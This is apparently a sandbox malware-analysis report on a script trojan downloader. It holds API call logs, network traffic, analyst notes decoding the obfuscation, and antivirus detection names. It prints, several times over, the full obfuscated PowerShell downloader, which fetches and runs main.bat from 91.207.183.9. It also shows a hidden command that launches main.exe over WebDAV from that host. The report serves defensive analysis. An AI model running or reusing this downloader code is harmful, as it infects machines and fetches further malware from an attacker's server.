allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\main.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
filepath: powershell.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2920
thread_handle: 0x00000088
process_identifier: 2916
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data received HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 00:41:20 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
Data received C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
Data sent soe-Ø&%ÑbPºÄ_;é 6H­“z?âD¨ö+É/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
Data sent soe-Ø&yÎ 8ŒUÊñ‚.O!ÒÜË hb®Þgõ/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
Data sent GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
host 91.207.183.9
file C:\Users\test22\AppData\Roaming\main.bat
Time & API Arguments Status Return Repeated

send

buffer: soe-Ø&%ÑbPºÄ_;é 6H­“z?âD¨ö+É/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
socket: 1432
sent: 120
1 120 0

send

buffer: soe-Ø&yÎ 8ŒUÊñ‚.O!ÒÜË hb®Þgõ/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
socket: 1432
sent: 120
1 120 0

send

buffer: GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
socket: 1132
sent: 75
1 75 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\main.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\main.bat
option -executionpolicy unrestricted value Attempts to bypass execution policy. Caveat: PowerShell execution policy is not a security boundary, so treat this flag as a detection signal rather than a control failure. This is the powershell.exe launched via ShellExecuteExW above; its string constants are obfuscated by adding 53361 to each character code (function DRtLNlwgqwjnKZDxdA subtracts it back) and decode to `.dll`, `.ps1`, `.msi`, `Hidden`, `Net.WebClient`, `https://www2.lunapic.com/do-not-link-here-use-hosting-instead/169712999657711418?95755383518` (presumably a decoy opened via Invoke-Item; matches the TLS SNI www2.lunapic.com in the Data sent lines) and `http://91.207.183.9:8000/main.bat` (matches the GET /main.bat request below).
option -executionpolicy unrestricted value Attempts to bypass execution policy. In this stage the downloaded file is written to %AppData%\main.bat and dispatched by extension: rundll32.exe for .dll, powershell.exe -ExecutionPolicy unrestricted -File for .ps1, `misexec /qn /i` for .msi (a typo for msiexec, so that branch would fail unless a `misexec` binary is on PATH), otherwise Start-Process — the path taken for main.bat — after which the file is marked with the Hidden attribute.
option -executionpolicy bypass value Attempts to bypass execution policy. This is the third powershell.exe, evidently the command carried by main.bat: the 154-byte text/plain body served by WsgiDAV (Data received above) is `powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe`, i.e. the next stage is fetched as a UNC path over WebDAV (`@8000` port syntax, DavWWWRoot) from the same host. Egress to 91.207.183.9 and outbound WebDAV/UNC access from user workstations are the controls to check; main.exe itself is not captured in this section of the report.
option -windowstyle hidden value Attempts to execute command with a hidden window (the -WindowStyle hidden flag on the third powershell.exe above).
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
Tencent Script.Trojan-Downloader.Generic.Xdkl
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
DrWeb Trojan.DownLoader46.24389
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
